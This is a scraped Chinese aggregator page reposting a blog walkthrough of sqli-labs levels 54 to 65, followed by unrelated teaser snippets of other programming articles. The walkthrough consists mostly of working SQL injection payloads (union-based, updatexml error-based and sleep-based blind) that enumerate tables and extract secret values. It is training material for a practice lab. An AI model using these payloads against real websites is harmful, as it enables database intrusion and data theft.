当前位置：首页 > news >正文

以sqlilabs靶场为例，讲解SQL注入攻击原理【54-65关】

news 文章来源：https://blog.csdn.net/weixin_42515203/article/details/139504904 2024/11/18 5:48:11

【Less-54】

与前面的题目不同是，这里只能提交10次，一旦提交超过十次，数据会重新刷新，所有的步骤需要重来一次。

解题步骤：

根据测试，使用的是单引号闭合。

# 判断字段的数量
?id=1' order by 3 -- aaa# 获取数据库的名字
?id=-1' union select 1,2,database() -- aa# 获取数据表的名字
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aa  # 获取字段名,上一步获取的数据表名为73m93vdzgg（随机生成的）
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='73m93vdzgg'-- aa  # 获取目标信息
?id=-1' union select 1,2,secret_8QFM from 73m93vdzgg -- aa

最后把获取到的Key值放入输入框中提交，通关。

【Less-55】

通过测试，使用的是括号闭合。

解题步骤：

# 判断字段的数量
?id=1) order by 3 -- aaa# 获取数据库的名字
?id=-1) union select 1,2,database() -- aa# 获取数据表的名字
?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aa  # 获取字段名,上一步获取的数据表名为lll4ndq8t5（随机生成的）
?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='lll4ndq8t5'-- aa  # 获取目标信息,字段名为secret_JY1K
?id=-1) union select 1,2,secret_JY1K from lll4ndq8t5 -- aa

【Less-56】

与上面两题类似，只是闭合的类型不同，采用的是单引号括号的方式。

解题步骤和上面基本一致，如下：

# 判断字段的数量
?id=1') order by 3 -- aaa# 获取数据库的名字
?id=-1') union select 1,2,database() -- aa# 获取数据表的名字
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aa  # 获取字段名,上一步获取的数据表名为bpunqnpx62（随机生成的）
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='bpunqnpx62'-- aa  # 获取目标信息,字段名为secret_0OCB
?id=-1') union select 1,2,secret_0OCB from bpunqnpx62 -- aa

【Less-57】

同样类型的题目，与之前的几题基本一样，只是闭合采用的是双引号。

解题步骤：

# 判断字段的数量
?id=1" order by 3 -- aaa# 获取数据库的名字
?id=-1" union select 1,2,database() -- aa# 获取数据表的名字
?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aa  # 获取字段名,上一步获取的数据表名为mim20rhi4p（随机生成的）
?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='mim20rhi4p'-- aa  # 获取目标信息,字段名为secret_3YCT
?id=-1" union select 1,2,secret_3YCT from mim20rhi4p -- aa

【Less-58】

通过测试，使用的是单引号闭合。

解题过程和之前的集体类似，只是没有回显信息，解题步骤如下：


# 获取数据库的名字
?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aa
# 获取数据表的名字
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- aa# 获取字段名,上一步获取的数据表字段名为s93lfq2cfa（随机生成的）
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='s93lfq2cfa'),0x7e),1) -- aa# 获取目标信息,字段名为secret_REV6
?id=-1' and updatexml(1,concat(0x7e,(select secret_REV6 from s93lfq2cfa),0x7e),1) -- aa

【Less-59】

与Less-58基本相同，唯一的不同在于闭合方式，Less-59是直接注入的方式。

# 获取数据库的名字
?id=-1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) # 获取数据表的名字 w7hf6t37nt
?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) # 获取字段名,上一步获取的数据表名为w7hf6t37nt（随机生成的）
?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='w7hf6t37nt'),0x7e),1)# 获取目标信息,字段名为secret_D5MM
?id=-1 and updatexml(1,concat(0x7e,(select secret_D5MM from w7hf6t37nt),0x7e),1)

【Less-60】

与上题类似，闭合使用的是双引号括号。

解题步骤：


# 获取数据库的名字
?id=-1") and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aa# 获取数据表的名字
?id=-1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- aa# 获取字段名,上一步获取的数据表名为kz7qxr5nq1（随机生成的）
?id=-1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='kz7qxr5nq1'),0x7e),1) -- aa# 获取目标信息,字段名为secret_TEGV
?id=-1") and updatexml(1,concat(0x7e,(select secret_TEGV from kz7qxr5nq1),0x7e),1) -- aa

【Less-61】

经过测试，本题的闭合方式为单引号加两个括号。

解题步骤：


# 获取数据库的名字
?id=-1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aa# 获取数据表的名字
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- aa# 获取字段名,上一步获取的数据表名为31nbt3hzri（随机生成的）
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='31nbt3hzri'),0x7e),1) -- aa# 获取目标信息,字段名为secret_QQ63
?id=-1')) and updatexml(1,concat(0x7e,(select secret_QQ63 from 31nbt3hzri),0x7e),1) -- aa

【Less-62】

此题的闭合方式为单引号加括号，与之前题目不同的是，此题没有显错，采用盲注的方式解题。

解题步骤：

# 获取数据库的名字，长度为10
?id=1') and length(database())=10 -- aa# 获取数据库的名字
?id=1') and if(ascii(substr(database(),1,1))=100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id=1') and if(length((select table_name from information_schema.tables where table_schema=database()limit 0,1))=10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的，没有统计标准，自行测试。
?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=98,sleep(5),1) -- aa# 获取字段名
?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name= 上一步获取的数据表名 limit 0,1),1,1))=98,sleep(5),1) -- aa

此时可以使用Burp Sutie工具实现名字的遍历。

【Less-63】

基本与Less-62一样，闭合是单引号闭合。

解题步骤：

# 获取数据库的名字，长度为10
?id=1' and length(database())=10 -- aa# 获取数据库的名字
?id=1' and if(ascii(substr(database(),1,1))=100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id=1' and if(length((select table_name from information_schema.tables where table_schema=database()limit 0,1))=10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的，没有统计标准，自行测试。
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=98,sleep(5),1) -- aa# 获取字段名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name= 上一步获取的数据表名 limit 0,1),1,1))=98,sleep(5),1) -- aa

【Less-64】

基本与Less-63一样，闭合是两个括号

解题步骤：

# 获取数据库的名字，长度为10
?id=1)) and length(database())=10 -- aa# 获取数据库的名字
?id=1)) and if(ascii(substr(database(),1,1))=100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id=1)) and if(length((select table_name from information_schema.tables where table_schema=database()limit 0,1))=10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的，没有统计标准，自行测试。
?id=1)) and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=98,sleep(5),1) -- aa# 获取字段名
?id=1)) and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name= 上一步获取的数据表名 limit 0,1),1,1))=98,sleep(5),1) -- aa

【Less-65】

基本与Less-63一样，闭合是双引号括号

解题步骤：

# 获取数据库的名字，长度为10
?id=1") and length(database())=10 -- aa# 获取数据库的名字
?id=1")  and if(ascii(substr(database(),1,1))=100,sleep(5),1) -- aa# 获取数据表名的长度,10
?id=1") and if(length((select table_name from information_schema.tables where table_schema=database()limit 0,1))=10,sleep(5),1) -- aa# 获取数据表的名字,此时的数据表名是随机生成的，没有统计标准，自行测试。
?id=1") and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=98,sleep(5),1) -- aa# 获取字段名
?id=1") and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name= 上一步获取的数据表名 limit 0,1),1,1))=98,sleep(5),1) -- aa

以sqlilabs靶场为例，讲解SQL注入攻击原理【54-65关】

【Less-54】与前面的题目不同是，这里只能提交10次，一旦提交超过十次，数据会重新刷新，所有的步骤需要重来一次。解题步骤： 根据测试，使用的是单引号闭合。 # 判断字段的数量 ?id1 order by 3 -- aaa# …...

编程日记 2024/6/9 8:46:36

详解 Flink 的时间语义和 watermark

一、Flink 时间语义类型 Event Time：是事件创建的时间。它通常由事件中的时间戳描述，例如采集的日志数据中，每一条日志都会记录自己的生成时间，Flink 通过时间戳分配器访问事件时间戳Ingestion Time ：是数据进入 Flink…...

编程日记 2024/6/9 8:45:35

Unreal Engine项目结构与关卡设置详解

引言 Unreal Engine 是一款功能强大的游戏引擎，为开发者提供了丰富的工具来创建和管理游戏项目。本文将详细介绍一个基本的 Unreal Engine 项目结构，并讲解如何在 Unreal 编辑器中进行关卡设置与操作。 Unreal Engine 项目结构一个基本的 Unreal Eng…...

编程日记 2024/6/9 8:43:33

Access数据中的SQL偏移注入

使用场景： 目标数据表的字段较多，无法一一获取的时候，尝试使用偏移注入的方式实现SQL注入。原理： 例如：一个表有6个字段，而你想获取的目标表admin的字段不知道，此时可以使用联合查询的方式获…...

编程日记 2024/6/9 8:42:32

Unity 编辑器扩展，获取目录下所有的预制件

先看演示效果实现方案 1创建几个用于测试的cube 2，创建一个Editor脚本 3，编写脚本内容附上源码 using UnityEditor; using UnityEngine;public class GetPrefeb : EditorWindow {private string folderPath "Assets/Resources"; // 指定预…...

编程日记 2024/6/9 8:41:31

【Python】解决Python报错：ValueError: not enough values to unpack (expected 2, got 1)

文章目录引言1. 错误详解2. 常见的出错场景2.1 函数返回值解包2.2 遍历含有不同长度元组的列表 3. 解决方案3.1 检查和调整返回值3.2 安全的解包操作 4. 预防措施4.1 使用异常处理4.2 单元测试结语引言在Python编程中，ValueError 是一个常见的异常类…...

编程日记 2024/6/9 8:40:30

政安晨【零基础玩转各类开源AI项目】解析开源：gradio：改进真实虚拟试穿的扩散模型

政安晨的个人主页：政安晨欢迎 👍点赞✍评论⭐收藏收录专栏: 零基础玩转各类开源AI项目希望政安晨的博客能够对您有所裨益，如有不足之处，欢迎在评论区提出指正！ Gradio 是一个开源 Python 软件包，可以让你…...

编程日记 2024/6/9 8:38:28

深入解读Prometheus Adapter：云原生监控的核心组件

一、引言 Prometheus Adapter的背景与重要性在现代的云原生架构中，微服务和容器化技术得到了广泛的应用。这些技术带来了系统灵活性和扩展性的提升，但同时也增加了系统监控和管理的复杂度。Prometheus作为一款开源的监控系统，因其强大的指标…...

编程日记 2024/6/9 8:37:27

【计算机视觉】数字图像处理基础：以像素为单位的图像基本运算（点运算、代数运算、逻辑运算、几何运算、插值）

0、前言在上篇文章中，我们对什么是数字图像、以及数字图像的组成（离散的像素点）进行了讲解🔗【计算机视觉】数字图像处理基础知识：模拟和数字图像、采样量化、像素的基本关系、灰度直方图、图像的分类。我们知道&a…...

编程日记 2024/6/9 8:36:26

Spring Boot整合WebSocket和Redis实现直播间在线人数统计功能

😄 19年之后由于某些原因断更了三年，23年重新扬帆起航，推出更多优质博文，希望大家多多支持～ 🌷 古之立大事者，不惟有超世之才，亦必有坚忍不拔之志 🎐 个人CSND主页——Mi…...

编程日记 2024/6/9 8:34:24

uniapp自定义的下面导航

uniapp自定义的下面导航看看效果图片吧文章目录 uniapp自定义的下面导航看看效果图片吧 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6aa0e964741d4dd3a58f4e86c4bf3247.png) 前言一、写组件、我这里就没有写组件了直接写了一个页面？总结前言在…...

编程日记 2024/6/9 8:33:23

【Python】selenium使用find_element时解决【StaleElementReferenceException】问题的方法

StaleElementReferenceException 是 Selenium WebDriver 中的一种异常，通常在元素与当前页面的状态不同步时抛出，比如页面已经刷新或导航到另一个页面，但是尝试操作的元素引用仍然是旧页面上的元素。以下是一些解决 StaleElementReferenceE…...

编程日记 2024/6/9 8:30:20

Apache IoTDB 分布式架构三部曲（三）副本与共识算法

IoTDB 首创并应用的共识协议统一框架，为用户提供了灵活选择不同共识算法的可能性。对于一个分布式集群而言，为了使得海量数据场景下集群能够横向扩展，集群需要按照一定的规则将全部数据分成多个子集存储在不同的节点上，从而能够更…...

编程日记 2024/6/9 8:29:19

数据挖掘--聚类分析：基本概念和方法

数据挖掘--引论数据挖掘--认识数据数据挖掘--数据预处理数据挖掘--数据仓库与联机分析处理数据挖掘--挖掘频繁模式、关联和相关性：基本概念和方法数据挖掘--分类数据挖掘--聚类分析：基本概念和方法聚类分析聚类分析是把一个数据对象&…...

编程日记 2024/6/9 8:26:17

APP单页分发源码下载安卓苹果自动识别apk描述文件免签自动安装

下载地址：APP单页分发源码下载安卓苹果自动识别apk描述文件免签自动安装...

编程日记 2024/6/9 8:25:15

1.定时器创建与停止 //定时器使用t1 : time.NewTimer(2 * time.Second)<-t1.Cfmt.Println("timer1 fired")t2 : time.NewTimer(5 * time.Second)go func() {fmt.Println("go协程处理中,等待5秒后输出...")<-t2.Cfmt.Println("timer2 fired&quo…...

编程日记 2024/6/9 8:22:12

[FSCTF 2023]Tea_apk

得到密文和密钥 import base64 from ctypes import c_uint32import libnumDELTA 0x9E3779B9def decrypt(v, n, k):rounds 6 int(52 / n)sum c_uint32(rounds * DELTA)y v[0].valuewhile rounds > 0:e (sum.value >> 2) & 3p n - 1while p > 0:z v[p …...

编程日记 2024/6/9 8:21:10

分享一个用python写的本地WIFI密码查看器

本章教程，主要分享一个本地wifi密码查看器，用python实现的，感兴趣的可以试一试。具体代码 import subprocess # 导入 subprocess 模块，用于执行系统命令 import tkinter as tk # 导入 tkinter 模块，用于创建图形用…...

编程日记 2024/6/9 8:20:08

【SkyWalking】启用apm-trace-ignore-plugin追踪忽略插件

背景使用Agent采集追踪数据的时候，想排除某些路径，比如健康检查等，这样可以减少上报的数据，也可以去除一些不必要的干扰数据。加载插件在agent/optional-plugins目录中有个apm-trace-ignore-plugin-${version}.jar插件&…...

编程日记 2024/6/9 8:19:07

独立游戏之路 -- 获取OAID提升广告收益

Unity 之获取手机：OAID、IMEI、ClientId、GUID 前言一、Oaid 介绍1.1 Oaid 说明1.2 移动安全联盟(MSA) 二、站在巨人的肩膀上2.1 本文实现参考2.2 本文实现效果2.3 本文相关插件三、Unity 中获取Oaid3.1 查看实现源码3.2 工程配置3.3 代码实现3.4 场景搭建四、总…...

编程日记 2024/6/9 8:18:06

反转链表（oj题）

一、题目链接 https://leetcode.cn/problems/reverse-linked-list/submissions/538124207 二、题目思路 1.定义三个指针，p1先指向NULL p2指向头结点 p3指向第二个结点 2.p2的next指向p1。然后移动指针，p1来到p2的位置，p2来到p3的位置&…...

编程日记 2024/6/9 8:15:02

Mysql使用中的性能优化——批量插入的规模对比

在《Mysql使用中的性能优化——单次插入和批量插入的性能差异》中，我们观察到单次批量插入的数量和耗时呈指数型关系。这个说明，不是单次批量插入的数量越多越好。本文我们将通过实验测试出本测试案例中最佳的单次批量插入数量。结论本案例中约每次…...

编程日记 2024/6/9 8:13:00

TCP为什么握手是三次，而挥手是四次

TCP（传输控制协议）使用三次握手（3WHS）来建立一个可靠的连接，并使用四次挥手（4WHS）来终止连接。以下是每个步骤的详细解释： 三次握手（3WHS）建立连接&#xff…...

编程日记 2024/6/9 8:11:59

前端面试题大合集9----TypeScript

目录一、TypeScript 中静态类型的概念及其好处二、如何在 TypeScript 的接口中定义可选属性？ 三、解释 TypeScript 中联合类型的概念并提供示例四、TypeScript 中的类型断言是什么？ 五、TS中泛型是什么？ 六、解释 TypeScript 中的“…...

编程日记 2024/6/9 8:08:56

Linux：动态库和静态库的编译与使用

目录 1.前言 2.静态链接库 3.静态链接库生成步骤 4.静态链接库的使用 5.动态链接库 6.动态链接库生成步骤 7.动态链接库的使用 8.动态链接库无法加载 9.解决动态链接库无法加载问题前言在《MinGW：从入门到链接库》博客中简单介绍了如何编译动态链接库和静态链接库…...

编程日记 2024/6/9 8:07:55

【Pyqt6 学习笔记】DIY一个二维码解析生成小工具

文章目录 Pycharm 配置QtDesignerPyUIC基本模板代码示例依赖包main.pyscreen_shot_module.pyuntitled.pyuntitled.ui Pycharm 配置摘自PyQT6的从零开始在Pycharm中配置与使用——蹦跑的蜗牛 pip install PyQt6 PyQt6-toolsQtDesigner File -> Settings -> External …...

编程日记 2024/6/9 8:06:53

关于xilinx srio ip复位问题

关于xilinx srio ip复位问题语言 ：Verilg HDL 、VHDL EDA工具： Vivado 关于xilinx srio ip复位问题一、引言二、FPGA 之间 srio通信复位处理复位时序不同步：SRIO 模块未正确初始化：等待复位完成的时间不足：SRIO 配置…...

编程日记 2024/6/9 8:05:52

04 uboot 编译与调试

新手不需要详细掌握 uboot，只需要知道它是一个什么东西即可，工作中也只是改一些参数而已。 1、uboot 是什么 Linux 系统要启动就必须需要一个 bootloader 程序，也就说芯片上电以后先运行一段 bootloader 程序。这段 bootloader 程序会先初始化 DDR 等外设，然后将 Linux 内…...

编程日记 2024/6/9 8:04:52

【机器学习】机器学习与医疗健康在智能诊疗中的融合应用与性能优化新探索

文章目录引言机器学习与医疗健康的基本概念机器学习概述监督学习无监督学习强化学习医疗健康概述疾病预测诊断辅助个性化治疗方案制定机器学习与医疗健康的融合应用实时健康监测数据预处理特征工程疾病预测与优化模型训练模型评估诊断辅助与优化深度学习应用个性化治疗方…...

编程日记 2024/6/9 8:03:49

在线OJ项目测试(selenium+Junit5)

目录在线OJ项目测试的思维导图在线OJ的UI自动化测试测试一：检查未登录时的页面访问以及一些未登录时的非法操作测试二：测试注册界面测试三：测试登录界面测试四：测试题目列表界面测试五：测试题目详情界面…...

编程日记 2024/6/9 8:02:48

建筑设计公司资质/惠州seo管理

腾讯云服务器用的是：CentOS 7.4 64位镜像; 一、登录服务器二、安装Apache 1.安装 yum -y install httpd 2.开启apache服务 systemctl start httpd.service 3.设置apache服务开机启动 systemctl enable httpd.service 4.验证apache服务是否安装成功在本机…...

编程日记 2024/11/18 2:28:53

做网站备案要多久/seo黑帽技术工具

接下来，在前面两篇文章理解的基础上，我们来看下maven2是如何应用在淘宝项目中。先看下项目工作环境中的setting.xml文件的配置： 这是一个最基本的设置，设置了登陆此资源库服务器的用户名、密码和资源库的位置。通过这两个设置&am…...

编程日记 2024/11/18 1:59:29

怎么做网站音乐/免费的模板网站

项目中使用了Lombok，这次升级之后，出现了如下问题： Caused by: com.fasterxml.jackson.databind.JsonMappingException: Can not construct instance of XXXXXXX(no Creators, like default construct, exist): can not deserialize from O…...

编程日记 2024/11/17 22:06:24